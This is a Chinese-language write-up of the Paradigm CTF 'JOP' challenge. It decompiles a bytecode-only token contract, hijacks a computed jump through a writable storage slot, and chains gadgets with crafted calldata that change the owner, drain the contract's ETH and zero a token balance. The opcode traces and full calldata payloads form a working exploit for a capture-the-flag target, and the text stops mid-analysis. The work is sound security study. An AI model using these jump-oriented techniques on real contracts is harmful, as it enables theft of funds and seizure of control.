Paradigm CTF - JOP

  • bixia1994
  • 发布于 2021-08-15 23:49
  • 阅读 3201

本题的核心思想跟之前做过的一道题目:Consensys CTF-02 栈溢出重定向利用的核心思想一致,即找到合约中的一个入口函数,通过该函数可以手动的构造一个栈。在手动构造的栈中,按照函数调用的顺序,将所需要的参数依次放入手动构造的栈里,然后依次调用所需的函数。最后找到一个出口,一般是一个jump Destination,结束调用。

Paradigm CTF - JOP

本题的核心思想跟之前做过的一道题目:Consensys CTF-02 栈溢出重定向利用的核心思想一致,即找到合约中的一个入口函数,通过该函数可以手动的构造一个栈。在手动构造的栈中,按照函数调用的顺序,将所需要的参数依次放入手动构造的栈里,然后依次调用所需的函数。最后找到一个出口,一般是一个jump Destination,结束调用。

本文参考链接如下:https://www.youtube.com/embed/OYs-2Vqvdow
image20210815234705289.png

合约分析

首先分析下Setup合约中,要解决本题的要求是什么:

function isSolved() public view returns (bool) {
    return  challenge.owner() == 0xdeaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD &&
            challenge.balanceOf(address(this)) == 0 &&
            address(challenge).balance == 0;
}

简单来看,需要让合约同时满足三个条件:1. 改变合约的owner为给定值,2. 清空合约的所有ETH,3. 清空合约中关于setup的状态。

由于challenge合约是不开源的,只提供了二进制代码,故为方便调试,我们首先需要部署一个challenge合约:

pragma solidity ^0.7.0;

import "./Setup.sol";

contract Hack {
    ChallengeInterface public challenge;
    
    constructor() public payable {
        require(msg.value == 50 ether);
        address addr;
        bytes memory data = hex'0x6080...6170';
        assembly{
            addr := create(0,add(data,0x20),mload(data))
        }
        require(addr != address(0), "Hack/constructor failed to create contract");
        challenge = ChallengeInterface(addr);
        challenge.buyTokens{value: msg.value}();
    }
}

步骤一:找到入口函数

将编译后的二进制代码通过网站Online Solidity Decompiler (ethervm.io)反编译得到OPCODE代码,浏览反编译得到的代码: 在buyTokens方法中,有一个非常有趣的注解:==Error: Could not resolve jump destination!== 这通常是由于Jump的地址不是预先写好在代码中,而是动态计算得到的。

else if (var0 == 0xd0febe4c) {
            // Dispatch table entry for buyTokens()
            var1 = 0x0774;
            var2 = 0x0ed0;
        
            if (msg.sender == storage[0x05] / 0x0100 ** 0x01 & 0xffffffffffffffffffffffffffffffffffffffff) {
            label_1CB2:
            
                if (tx.gasprice < 0x2e90edd000) {
                    var3 = 0x1d39;
                    var4 = msg.value;
                    // Error: Could not resolve jump destination!
                }
=>
function buyTokens() public payable{
    address owner;
    assembly{
        owner := sload(0x05)
    }
    require(owner == msg.sender);
    uint gasPrice_;
    assembly{
        gasPrice_ := gasprice()
    }
    if (gasPrice_ < 0x2e90edd000) {
        bytes4 nextFunc;
        assembly{
            nextFunc := and(0xffffffff,and(0xffffffffffffffff,sload(0x0b)))
            //跳转时,nextFunc函数的参数为msg.value, 返回位点为0x1d39
            jump(nextFunc)
        }
    }
}

下面我们再进一步跳转到label_1CB2函数中,看下它具体的执行逻辑:可以看到label_1D0F的跳转地址是存储在0x0b的storage中。如果我们能够向0x0b的插槽写值,则我们可以控制它跳转到任何我们想要去的地方。

label_1CB2:
	1CB2    5B  JUMPDEST
	1CB3    64  PUSH5 0x2e90edd000
	1CB9    3A  GASPRICE
	1CBA    10  LT
	1CBB    61  PUSH2 0x1d0f
	1CBE    57  *JUMPI
label_1D0F:
	// Incoming jump from 0x1CBE, if tx.gasprice < 0x2e90edd000
	// Inputs[2]
	// {
	//     @1D13  msg.value
	//     @1D19  storage[0x0b]
	// }
	1D0F    5B  JUMPDEST	
	1D10    61  PUSH2 0x1d39 0x1d39
	1D13    34  CALLVALUE	 0x1d39 value
	1D14    60  PUSH1 0x0b	 0x1d39 value 0x0b
	1D16    60  PUSH1 0x00	 0x1d39 value 0x0b 0x00
	1D18    90  SWAP1		 0x1d39 value 0x00 0x0b
 	1D19    54  SLOAD		 0x1d39 value 0x00 s[0x0b]
	1D1A    90  SWAP1		 0x1d39 value s[0x0b] 0x00 
	1D1B    61  PUSH2 0x0100  0x1d39 value s[0x0b] 0x00 0x0100
	1D1E    0A  EXP			 0x1d39 value s[0x0b] 1
	1D1F    90  SWAP1		 0x1d39 value 1 s[0x0b]
	1D20    04  DIV			 0x1d39 value s[0x0b]
	1D21    80  DUP1		 0x1d39 value s[0x0b] s[0x0b] 
	1D22    15  ISZERO		 0x1d39 value s[0x0b] 0
	1D23    61  PUSH2 0x1f51 0x1d39 value s[0x0b] 0 0x1f51
	1D26    02  MUL			 0x1d39 value s[0x0b] 0
	1D27    17  OR			 0x1d39 value s[0x0b]
	1D28    67  PUSH8 0xffffffffffffffff
							 0x1d39 value s[0x0b] 0xff..
	1D31    16  AND			 0x1d39 value s[0x0b][:8]
	1D32    63  PUSH4 0xffffffff value s[0x0b] 0x1d39 value s[0x0b] 0xff..
	1D37    16  AND			 0x1d39 value s[0x0b][:4]
	1D38    56  *JUMP        0x1d39 value 
	
function 1D0F() internal payable {
    bytes4 nextFunc;
    assembly{
        nextFunc := and(0xffffffff,and(0xffffffffffffffff,sload(0x0b)))
        //跳转时,nextFunc函数的参数为msg.value, 返回位点为0x1d39
        jump(nextFunc)
    }
}

接下来,我们需要找到能够写入storage[0x0b]的方法,我们发现方法func_0350可以写入storage[0x0b],但它是一个internal方法,无法被我们调用。于是我们再找到对应的external方法:0x27f83350

function func_0350(var arg0, var arg1) {
    arg0 = msg.data[arg0:arg0 + 0x20];
    storage[0x0b] = arg0;
}
=>
function func_0350(uint arg) internal{
    uint256 v = arg;
    assembly{
        sstore(0x0b, v)
    }
}

这样我们就找到了函数0x27f83350, 从函数中可以看到,0x27f83350是一个non-payable函数,接受ETH, 以及一个长度为0x20的参数,并将该参数写入storage[0x0b]中。

function 0x27f83350 public{
    var1 = msg.value;

    if (var1) { revert(memory[0x00:0x00]); }

    var1 = 0x0366;
    var2 = 0x04;
    var3 = msg.data.length - var2;

    if (var3 < 0x20) { revert(memory[0x00:0x00]); }

    func_0350(var2, var3);
    stop();
}
=> 
function 0x27f83350(uint arg) public nonPayable{
    require(msg.value == 0);
    uint256 v = arg;
    assembly{
        sstore(0x0b, v)
    }
}

此时,我们可以通过0x27f83350函数设置0x0b插槽中的值,然后通过调用buyTokens函数进入,根据插槽0x0b的值从而跳转到任何我们想要跳转的位置

步骤二:构造堆栈

此时,关键是分析我们需要跳转到哪个位置来构造所需要的堆栈。

首先我们需要继续分析下1D0F()的跳转,从上面的分析可以看到,它跳转时会带一个参数msg.value过去到nextFunc中,然后nextFunc会跳转回0x1d39。此时需要关注一点,nextFunc的返回值在栈里如何排序?nextFunc的返回值必定在0x1d39下方,因为这样才可以Jump到0x1d39实现函数返回。

LABEL 1D39:
    1D39    5B    JUMPDEST
    1D3A    56    *JUMP

简单来讲,当函数跳转到1D39后,又会马上按照此时的栈首位进行跳转。故nextFunc函数必须要有返回值,且函数参数只能有一个,即msg.value.

此时我们查看反编译的代码发现, 如下6个函数都满足。但此时我们需要进一步思考,nextFunc的返回值肯定是越多越好,故我们首先查看func_19FC

saleHardcap(arg0) returns (r0)
sellRate(arg0) returns (r0)
nextOwner(arg0) returns (r0)
owner(arg0) returns (r0)
saleCount(arg0) returns (r0)
func_19FC(arg0) returns (r0, r1, r2, r3)
function func_19FC(var arg0) returns (var r0, var arg0, var r2, var r3) {
    r2 = 0x00;
    r3 = r2;
    var var2 = 0x00;
    var var3 = var2;
    var temp0 = arg0;
    var var4 = msg.data[temp0:temp0 + 0x20];
    var var5 = msg.data[temp0 + 0x20:temp0 + 0x20 + 0x20];
    var var6 = msg.data[temp0 + 0x40:temp0 + 0x40 + 0x20];
    var var7 = msg.data[temp0 + 0x60:temp0 + 0x60 + 0x20];

    if (var5 <= 0x00 << 0x00) {
        var temp11 = memory[0x40:0x60];
        memory[temp11:temp11 + 0x20] = 0x08c379a000000000000000000000000000000000000000000000000000000000;
        var temp12 = temp11 + 0x04;
        var temp13 = temp12 + 0x20;
        memory[temp12:temp12 + 0x20] = temp13 - temp12;
        memory[temp13:temp13 + 0x20] = 0x12;
        var temp14 = temp13 + 0x20;
        memory[temp14:temp14 + 0x20] = 0x736967436865636b2f722d69732d7a65726f0000000000000000000000000000;
        var temp15 = memory[0x40:0x60];
        revert(memory[temp15:temp15 + (temp14 + 0x20) - temp15]);
    } else if (var6 <= 0x00 << 0x00) {
        var temp6 = memory[0x40:0x60];
        memory[temp6:temp6 + 0x20] = 0x08c379a000000000000000000000000000000000000000000000000000000000;
        var temp7 = temp6 + 0x04;
        var temp8 = temp7 + 0x20;
        memory[temp7:temp7 + 0x20] = temp8 - temp7;
        memory[temp8:temp8 + 0x20] = 0x12;
        var temp9 = temp8 + 0x20;
        memory[temp9:temp9 + 0x20] = 0x736967436865636b2f732d69732d7a65726f0000000000000000000000000000;
        var temp10 = memory[0x40:0x60];
        revert(memory[temp10:temp10 + (temp9 + 0x20) - temp10]);
    } else if (var6 > 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0 << 0x00) {
        var temp1 = memory[0x40:0x60];
        memory[temp1:temp1 + 0x20] = 0x08c379a000000000000000000000000000000000000000000000000000000000;
        var temp2 = temp1 + 0x04;
        var temp3 = temp2 + 0x20;
        memory[temp2:temp2 + 0x20] = temp3 - temp2;
        memory[temp3:temp3 + 0x20] = 0x12;
        var temp4 = temp3 + 0x20;
        memory[temp4:temp4 + 0x20] = 0x736967436865636b2f6d616c6c6561626c650000000000000000000000000000;
        var temp5 = memory[0x40:0x60];
        revert(memory[temp5:temp5 + (temp4 + 0x20) - temp5]);
    } else if (var7 >= 0x1b) {
        r3 = var7;
        arg0 = var5;
        r2 = var6;
        r0 = var4;
        return r0, arg0, r2, r3;
    } else {
        r3 = var7 + 0x1b;
        arg0 = var5;
        r2 = var6;
            r0 = var4;
            return r0, arg0, r2, r3;
        }
}
=>
function func_19fc(uint arg) internal returns(uint,uint,uint,uint) {
    uint offset = arg;
    uint var4;
    uint var5;
    uint var6;
    uint var7;
    assembly{
        var4 := calldataload(offset)
        var5 := calldataload(add(offset, 0x20))
        var6 := calldataload(add(offset, 0x40))
        var7 := calldataload(add(offset, 0x60))
    }
    if (var5 <= 0x00) {
        assembly{
            let temp11 := mload(0x40)
            mstore(temp11,
                  0x08c379a000000000000000000000000000000000000000000000000000000000)
            let temp12 := add(temp11, 0x04)
            mstore(temp12, 0x20)
            mstore(add(temp12,0x20),0x12)
            mstore(add(temp12,0x40),
                  0x736967436865636b2f722d69732d7a65726f0000000000000000000000000000)
            revert(temp11,0x64)
            //0x08c379a0
            //0000000000000000000000000000000000000000000000000000000000100000
            //0000000000000000000000000000000000000000000000000000000000010010
            //736967436865636b2f722d69732d7a65726f0000000000000000000000000000
        }
    } else if (var6 <= 0x00) {
        与var5 <= 0一致
    } else if(var6 > 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0){
        与var5 <= 0一致
    } else if (var7 >= 0x1b) {
        return var4, offset, var6, var7;
    } else {
        return var4, var5, var6, var7+0x1b;
    }
}

从上面的func_19FC函数我们分析得知:它会消耗一个参数,将这个参数用作calldata的offset量,然后从calldadta中拷贝4个uint32的值到栈空间中。当func_19FC函数调用返回时,LABEL 1D39会继续Jump,此时Jump的地址即为返回的第一个值。

由于我们的目标是构造一个栈,故我们可以反复调用func_19FC,让其返回的第一个值就是func_19FC的方法位点,返回的第二个值是func_19FC的方法参数。这样==每调用一次func_19FC我们就向栈里写入了两个值==,==且该值均来自于calldata==。这正是我们想要的。

即此时的calldata应该为:

0x00 d0febe4c //buyToken()
0x04 0000000000000000000000000000000000000000000000000000000000000004//offset
0x24 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC
0x44 0000000000000000000000000000000000000000000000000000000000000084//var5 = next_offset
0x64 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff//var6 = payload1
0x84 000000000000000000000000000000000000000000000000000000000000001a//var7 = payload2

步骤三:堆栈设计

从上面的分析中,我们已经有能力去构造一个堆栈,但是堆栈中的内容应该如何去设计呢?
image20210815182047087.png

image20210815093551094.png

还是从Setup中的解题条件开始:

条件1:改变合约的owner为给定值

首先是查看:nextOwner()函数发现该函数实际返回的是Storage[0x06]的值,故需要去OPCODE中找到给Storage[0x06]写值的函数:label_102A

label_102A:
	102A    5B  JUMPDEST		jumpback deadbeaf
	102B    80  DUP1			jumpback deadbeaf deadbeaf
	102C    60  PUSH1 0x06		jumpback deadbeaf deadbeaf 0x06
	102E    60  PUSH1 0x00		jumpback deadbeaf deadbeaf 0x06 0x00
	1030    61  PUSH2 0x0100	jumpback deadbeaf deadbeaf 0x06 0x00 0x0100
	1033    0A  EXP				jumpback deadbeaf deadbeaf 0x06 0x01
	1034    81  DUP2			jumpback deadbeaf deadbeaf 0x06 0x01 0x06
	1035    54  SLOAD			jumpback deadbeaf deadbeaf 0x06 0x01 s[06]
	1036    81  DUP2			jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0x01
	1037    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0x01 0xff
	104C    02  MUL				jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0xff
	104D    19  NOT				jumpback deadbeaf deadbeaf 0x06 0x01 s[06] 0x11..00
	104E    16  AND				jumpback deadbeaf deadbeaf 0x06 0x01 0
	104F    90  SWAP1			jumpback deadbeaf deadbeaf 0x06 0 0x01
	1050    83  DUP4			jumpback deadbeaf deadbeaf 0x06 0 0x01 deadbeaf
	1051    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpback deadbeaf deadbeaf 0x06 0 0x01 deadbeaf 0xff
	1066    16  AND				jumpback deadbeaf deadbeaf 0x06 0 0x01 deadbeaf
	1067    02  MUL				jumpback deadbeaf deadbeaf 0x06 0 deadbeaf
	1068    17  OR				jumpback deadbeaf deadbeaf 0x06 deadbeaf
	1069    90  SWAP1			jumpback deadbeaf deadbeaf deadbeaf 0x06
	106A    55  SSTORE			jumpback deadbeaf deadbeaf
	106B    50  POP				jumpback deadbeaf
	106C    50  POP				jumpback
	106D    56  *JUMP
=>
function label_102A(address deadbeaf, uint jumpback) internal {
	address deadbeaf_ = deadbeaf;
	uint jumpback_ = jumpback;
	assembly{
		let newOwner := and(0xffffffffffffffffffffffffffffffffffffffff, deadbeaf_)
		sstore(0x06, deadbeaf)
		jump(jumpback)
	}
}

故此时的calldata应该为:

0x00 d0febe4c //buyToken()
0x04 0000000000000000000000000000000000000000000000000000000000000004//offset
0x24 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC
0x44 00000000000000000000000000000000000000000000000000000000000000a4//var5 = next_offset
0x64 000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf
0x84 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback

这里我们需要找到对应的jumpback的值, 这里的值应该是191B

条件2. 清空合约的所有ETH

要清空所有的ETH则必须要有CALL这一个OPCODE,通过查找全文中的call OPCODE,我们发现label_191B中存在这一个特征值。

label_191B:
	191B    5B  JUMPDEST	address balance
	191C    60  PUSH1 0x00	address balance 0x00
	191E    82  DUP3		address balance 0x00 address 
	191F    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
							address balance 0x00 address 0xff
	1934    16  AND			address balance 0x00 address
	1935    82  DUP3		address balance 0x00 address balance
	1936    60  PUSH1 0x40	address balance 0x00 address balance 0x40
	1938    51  MLOAD		address balance 0x00 address balance M[40]
	1939    80  DUP1		address balance 0x00 address balance M[40] M[40]
	193A    60  PUSH1 0x00	address balance 0x00 address balance M[40] M[40] 0x00
	193C    01  ADD			address balance 0x00 address balance M[40] M[40]
	193D    90  SWAP1		address balance 0x00 address balance M[40] M[40]
	193E    50  POP			address balance 0x00 address balance M[40]
	193F    60  PUSH1 0x00  address balance 0x00 address balance M[40] 0x00
	1941    60  PUSH1 0x40  address balance 0x00 address balance M[40] 0x00 0x40
	1943    51  MLOAD		address balance 0x00 address balance M[40] 0x00 M[40]
	1944    80  DUP1		address balance 0x00 address balance M[40] 0x00 M[40] M[40]
	1945    83  DUP4		address balance 0x00 address balance M[40] 0x00 M[40] M[40] M[40]
	1946    03  SUB			address balance 0x00 address balance M[40] 0x00 M[40] 0
	1947    81  DUP2		address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40]
	1948    85  DUP6		address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40] balance
	1949    87  DUP8		address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40] balance address
	194A    5A  GAS			address balance 0x00 address balance M[40] 0x00 M[40] 0 M[40] balance address gas
	194B    F1  CALL		address balance 0x00 address balance M[40] 0x01
	194C    92  SWAP3		address balance 0x00 0x01 balance M[40] address
	194D    50  POP			address balance 0x00 0x01 balance M[40]
	194E    50  POP			address balance 0x00 0x01 balance
	194F    50  POP			address balance 0x00 0x01
	1950    3D  RETURNDATASIZE	address balance 0x00 0x01 rsize
	1951    80  DUP1		address balance 0x00 0x01 rsize rsize
	1952    60  PUSH1 0x00  address balance 0x00 0x01 rsize rsize 0x00
	1954    81  DUP2		address balance 0x00 0x01 rsize rsize 0x00 rsize
	1955    14  EQ			address balance 0x00 0x01 rsize rsize 0x01
	1956    61  PUSH2 0x197b address balance 0x00 0x01 rsize rsize 0x01 0x197b
	1959    57  *JUMPI		address balance 0x00 0x01 rsize rsize
=>
function label_191B(address _addr, uint balance) internal {
	(bool success, ) = address(this).call{value:balance,to:_addr}("");
	uint returndatasize_;
	assembly{
		returndatasize_ := returndatasize()
		if eq(returndatasize_,0x00) {
			jump(0x197b)
		}
	}
}

从上述分析可以知道,当跳转到label_191B时,实际上调用了address(this).call{value:ether,to:addr}("")方法,即将该合约地址上的所有ETH全部转移给了某一个addr地址。

此时的内存应为:

000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf
000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback
000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance
0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意

则此时的calldata应该为:

0x00 d0febe4c //buyToken()
0x04 0000000000000000000000000000000000000000000000000000000000000004//offset
0x24 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC
0x44 00000000000000000000000000000000000000000000000000000000000000a4//var5 = next_offset
0x64 000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf
0x84 000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback
0xa4 00000000000000000000000000000000000000000000000000000000000019FC//var4 = label_19FC
0xc4 0000000000000000000000000000000000000000000000000000000000000124//var5 = next_offset
0xe4 000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance = 50ether+4wei
0x104 0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意

注意到这里跳转到了一个固定的位点0x197b,我们需要进入该位点查看下:

label_197B:
	197B    5B  JUMPDEST    back7 back6 back5 back4 back3 back2 back1 
	197C    60  PUSH1 0x60  back7 back6 back5 back4 back3 back2 back1 0x60
	197E    91  SWAP2		back7 back6 back5 back4 back3 0x60 back1 back2
	197F    50  POP			back7 back6 back5 back4 back3 0x60 back1
	1980    5B  JUMPDEST	
	1981    50  POP			back7 back6 back5 back4 back3 0x60
	1982    50  POP			back7 back6 back5 back4 back3
	1983    90  SWAP1		back7 back6 back5 back3 back4
	1984    50  POP			back7 back6 back5 back3 
	1985    80  DUP1		back7 back6 back5 back3 back3
	1986    61  PUSH2 0x19f7 back7 back6 back5 back3 back3 0x19f7
	1989    57  *JUMPI
label_19F7:
	19F7    5B  JUMPDEST	back7 back6 back5 back3
	19F8    50  POP			back7 back6 back5
	19F9    50  POP			back7 back6
	19FA    50  POP			back7
	19FB    56  *JUMP

在这个位点中,pop了多个内存中的字段,所以我们需要按照要求将内存设计成满足它pop的结构,则此时的内存为:

000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf
000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback
000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance
0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意
0000000000000000000000000000000000000000000000000000000000000000//var6 = back1
0000000000000000000000000000000000000000000000000000000000000000//var7 = back2
0000000000000000000000000000000000000000000000000000000000000001//var6 = back3
0000000000000000000000000000000000000000000000000000000000000000//var7 = back4
0000000000000000000000000000000000000000000000000000000000000000//var6 = back5
0000000000000000000000000000000000000000000000000000000000000000//var7 = back6
0000000000000000000000000000000000000000000000000000000000001263//var6 = back7:下一个位点
0000000000000000000000000000000000000000000000000000000000000000//var7 = UNKNOW

条件3. 清空合约中关于setup的状态

因为是balance[address(setup)]的状态要清空,所以需要考虑到solidity中对于map的存储。简单来讲,合约中存储map会首先将该key的值与map对应的插槽点的值进行连接,成为一个64byte的值,然后调用keccak256取得哈希值,该哈希值即为该map中值所对应的插槽。故,需要清空balance[address(setup)]我们只需要在整个OPCODE中搜索SHA3即可。注意不要写道allowance[owner][spender]里面去了。

label_1563:
	1563    5B  JUMPDEST		jumpBack x key y value
	1564    60  PUSH1 0x00		jumpBack x key y value 0x00
	1566    80  DUP1			jumpBack x key y value 0x00 0x00
	1567    84  DUP5			jumpBack x key y value 0x00 0x00 key
	1568    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpBack x key y value 0x00 0x00 key 0xff
	157D    16  AND				jumpBack x key y value 0x00 0x00 key
	157E    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpBack x key y value 0x00 0x00 key 0xff
	1593    16  AND				jumpBack x key y value 0x00 0x00 key
	1594    81  DUP2			jumpBack x key y value 0x00 0x00 key 0x00
	1595    52  MSTORE			jumpBack x key y value 0x00 0x00
	1596    60  PUSH1 0x20		jumpBack x key y value 0x00 0x00 0x20
	1598    01  ADD				jumpBack x key y value 0x00 0x20
	1599    90  SWAP1			jumpBack x key y value 0x20 0x00 
	159A    81  DUP2			jumpBack x key y value 0x20 0x00 0x20
	159B    52  MSTORE			jumpBack x key y value 0x20
	159C    60  PUSH1 0x20		jumpBack x key y value 0x20 0x20
	159E    01  ADD				jumpBack x key y value 0x40
	159F    60  PUSH1 0x00		jumpBack x key y value 0x40 0x00
	15A1    20  SHA3			jumpBack x key y value hash
	15A2    81  DUP2			jumpBack x key y value hash value
	15A3    90  SWAP1			jumpBack x key y value value hash
	15A4    55  SSTORE			jumpBack x key y value
	15A5    50  POP				jumpBack x key y
	15A6    81  DUP2			jumpBack x key y key
	15A7    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpBack x key y key 0xff
	15BC    16  AND				jumpBack x key y key
	15BD    83  DUP4			jumpBack x key y key x
	15BE    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpBack x key y key x 0xff
	15D3    16  AND				jumpBack x key y key x
	15D4    7F  PUSH32 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef
								jumpBack x key y key x 0xddf
	15F5    83  DUP4			jumpBack x key y key x 0xddf y
	15F6    60  PUSH1 0x40		jumpBack x key y key x 0xddf y 0x40
	15F8    51  MLOAD			jumpBack x key y key x 0xddf y M[40]
	15F9    80  DUP1			jumpBack x key y key x 0xddf y M[40] M[40]
	15FA    82  DUP3			jumpBack x key y key x 0xddf y M[40] M[40] y
	15FB    81  DUP2			jumpBack x key y key x 0xddf y M[40] M[40] y M[40]
	15FC    52  MSTORE			jumpBack x key y key x 0xddf y M[40] M[40]
	15FD    60  PUSH1 0x20		jumpBack x key y key x 0xddf y M[40] M[40] 0x20
	15FF    01  ADD				jumpBack x key y key x 0xddf y M[40] M[40]+0x20
	1600    91  SWAP2			jumpBack x key y key x 0xddf M[40]+0x20 M[40] y
	1601    50  POP				jumpBack x key y key x 0xddf M[40]+0x20 M[40]
	1602    50  POP				jumpBack x key y key x 0xddf M[40]+0x20
	1603    60  PUSH1 0x40		jumpBack x key y key x 0xddf M[40]+0x20 0x40
	1605    51  MLOAD			jumpBack x key y key x 0xddf M[40]+0x20 M[40]
	1606    80  DUP1			jumpBack x key y key x 0xddf M[40]+0x20 M[40] M[40]
	1607    91  SWAP2			jumpBack x key y key x 0xddf M[40] M[40] M[40]+0x20
	1608    03  SUB				jumpBack x key y key x 0xddf M[40] 0x20
	1609    90  SWAP1			jumpBack x key y key x 0xddf 0x20 M[40]
	160A    A3  LOG3			jumpBack x key y
	160B    50  POP				jumpBack x key
	160C    50  POP				jumpBack x
	160D    50  POP				jumpBack
	160E    56  *JUMP
	=>
	function label_1563(uint value,uint y, addr key, addr x, uint jumpBack) internal {
		balance[key] = value;
		uint k;
		assembly{
			mstore(mload(0x40),y)
			k := mload(0x40)
		}
		emit label_1563_event(k,0x20,0xddf,x,key)
		assembly{
			jump(jumpBack)
		}
	}

从上面的分析中,我们可以知道我们需要的栈应该是:

000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf
000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback
000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance
0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意
0000000000000000000000000000000000000000000000000000000000000000//var6 = back1
0000000000000000000000000000000000000000000000000000000000000000//var7 = back2
0000000000000000000000000000000000000000000000000000000000000001//var6 = back3
0000000000000000000000000000000000000000000000000000000000000000//var7 = back4
0000000000000000000000000000000000000000000000000000000000000000//var6 = back5
0000000000000000000000000000000000000000000000000000000000000000//var7 = back6
0000000000000000000000000000000000000000000000000000000000001563//var6 = back7:下一个位点
0000000000000000000000000000000000000000000000000000000000000000//var7 = value = 0
0000000000000000000000000000000000000000000000000000000000000000//var6 = y = 0
000000000000000000000000DA0bab807633f07f013f94DD0E6A4F96F8742B53//var7 = akey=address(setup)
0000000000000000000000000000000000000000000000000000000000000000//var6 = x = 0
0000000000000000000000000000000000000000000000000000000000000000//var7 = jumpBack

现在我们已经完成了条件2,3,针对条件1,我们在之前的分析中只是将0xdeadbeaf存入了slot[0x06]中,但是owner对应的插槽是slot[0x05]。这里我们找到0C4A

label_0C4A:
	0C4A    5B  JUMPDEST	jumpBack
	0C4B    60  PUSH1 0x06	jumpBack	0x06
	0C4D    60  PUSH1 0x00	jumpBack	0x06 0x00
	0C4F    90  SWAP1		jumpBack	0x00 0x06
	0C50    54  SLOAD		jumpBack	0x00 s[06]
	0C51    90  SWAP1		jumpBack	s[06] 0x00
	0C52    61  PUSH2 0x0100	jumpBack	s[06] 0x00 0x0100
	0C55    0A  EXP				jumpBack	s[06] 1
	0C56    90  SWAP1			jumpBack	1 s[06]
	0C57    04  DIV				jumpBack	s[06]
	0C58    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpBack	s[06] 0xff..
	0C6D    16  AND				jumpBack	s[06]
	0C6E    60  PUSH1 0x05		jumpBack	s[06] 0x05
	0C70    60  PUSH1 0x01		jumpBack	s[06] 0x05 0x01
	0C72    61  PUSH2 0x0100	jumpBack	s[06] 0x05 0x01 0x0100
	0C75    0A  EXP				jumpBack	s[06] 0x05 0x0100
	0C76    81  DUP2			jumpBack	s[06] 0x05 0x0100 0x05
	0C77    54  SLOAD			jumpBack	s[06] 0x05 0x0100 s[05]
	0C78    81  DUP2			jumpBack	s[06] 0x05 0x0100 s[05] 0x0100
 	0C79    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
 								jumpBack	s[06] 0x05 0x0100 s[05] 0x0100 0xff..
	0C8E    02  MUL				jumpBack	s[06] 0x05 0x0100 s[05] 0xff..00
	0C8F    19  NOT				jumpBack	s[06] 0x05 0x0100 s[05] 0x1111..ff
 	0C90    16  AND				jumpBack	s[06] 0x05 0x0100 s[05][:2]
	0C91    90  SWAP1			jumpBack	s[06] 0x05 s[05][:2] 0x0100 
	0C92    83  DUP4			jumpBack	s[06] 0x05 s[05][:2] 0x0100 s[06]
	0C93    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpBack	s[06] 0x05 s[05][:2] 0x0100 s[06] 0xff
	0CA8    16  AND				jumpBack	s[06] 0x05 s[05][:2] 0x0100 s[06]
	0CA9    02  MUL				jumpBack	s[06] 0x05 s[05][:2] s[06]00
	0CAA    17  OR				jumpBack	s[06] 0x05 s[06]xx
	0CAB    90  SWAP1			jumpBack	s[06] s[06]xx 0x05 
	0CAC    55  SSTORE			jumpBack	s[06]
	0CAD    50  POP				jumpBack
	0CAE    60  PUSH1 0x00		jumpBack	0x00
	0CB0    60  PUSH1 0x06		jumpBack	0x00 0x06
	0CB2    60  PUSH1 0x00		jumpBack	0x00 0x06 0x00
	0CB4    61  PUSH2 0x0100	jumpBack	0x00 0x06 0x00 0x0100
	0CB7    0A  EXP				jumpBack	0x00 0x06 0x01
	0CB8    81  DUP2			jumpBack	0x00 0x06 0x01 0x06
	0CB9    54  SLOAD			jumpBack	0x00 0x06 0x01 s[06]
	0CBA    81  DUP2			jumpBack	0x00 0x06 0x01 s[06] 0x06
	0CBB    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
								jumpBack	0x00 0x06 0x01 s[06] 0x06 0xff
	0CD0    02  MUL				jumpBack	0x00 0x06 0x01 s[06] 0x06..
	0CD1    19  NOT				jumpBack	0x00 0x06 0x01 s[06] 0xff06..
	0CD2    16  AND				
	0CD3    90  SWAP1
	0CD4    83  DUP4
	0CD5    73  PUSH20 0xffffffffffffffffffffffffffffffffffffffff
	0CEA    16  AND
	0CEB    02  MUL
	0CEC    17  OR
	0CED    90  SWAP1
	0CEE    55  SSTORE
	0CEF    50  POP
	0CF0    56  *JUMP
	
=>
